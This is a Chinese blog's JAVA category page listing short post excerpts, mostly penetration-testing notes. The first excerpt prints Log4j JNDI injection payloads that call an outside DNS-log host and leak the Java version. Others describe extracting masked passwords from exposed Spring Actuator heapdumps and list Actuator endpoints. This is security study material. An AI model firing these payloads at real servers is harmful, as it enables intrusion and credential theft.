随笔分类 - JAVA
发表于 2023-09-08 17:50阅读:394评论:0推荐:0
摘要:更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1
阅读全文 »
发表于 2023-05-11 12:43阅读:72评论:0推荐:0
摘要:本文源于换了个java版本结果之前的东西都没卸载干净,导致jar文件无法双击打开,但是java -version却好好的。由于懒一直没去正面面对。 近期一直用命令行java -jar的方式打开尤为苦恼,正赶着最近项目,便沉下心思好好修了修。 由于本篇文章仅作个人修复记录,故部分内容参考其他文章,侵删
阅读全文 »
发表于 2022-02-13 12:56阅读:1803评论:1推荐:0
摘要:Swagger接口泄露(脱敏获取密码) 概述: 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 利用条件: 可正常 GET 请求目标 /heapdump 或 /actuator/he
阅读全文 »
发表于 2022-01-24 10:09阅读:2369评论:0推荐:0
摘要:#Actuator Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块, 但如果没有做好相关权限控制, 非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息。 字典 /autoconfig /configprops /beans /
阅读全文 »
